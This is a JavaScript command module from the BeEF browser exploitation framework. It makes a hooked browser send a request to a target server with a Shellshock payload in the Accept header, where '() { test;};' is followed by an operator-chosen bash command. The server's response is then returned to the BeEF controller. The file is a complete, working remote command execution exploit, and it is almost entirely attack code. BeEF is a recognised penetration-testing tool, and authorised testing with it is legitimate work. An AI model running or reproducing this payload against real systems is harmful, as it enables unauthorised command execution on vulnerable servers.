27 lines
964 B
JavaScript
27 lines
964 B
JavaScript
//
|
|
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
beef.execute(function () {
|
|
try {
|
|
var target = "<%=@Target%>";
|
|
var command = "<%=@Bash_Command%>";
|
|
var method = "<%=@method%>";
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.open(method, target, true);
|
|
xhr.onload = function () {
|
|
};
|
|
xhr.onreadystatechange = function () {
|
|
if (xhr.readyState == 4 && xhr.status == 200) {
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+xhr.response);
|
|
}
|
|
}
|
|
xhr.setRequestHeader("Accept", "() { test;};echo \"Content-type: text/plain\"; echo; echo; " + command);
|
|
xhr.send(null);
|
|
} catch (e){
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result= Something wrong "+e.message);
|
|
}
|
|
});
|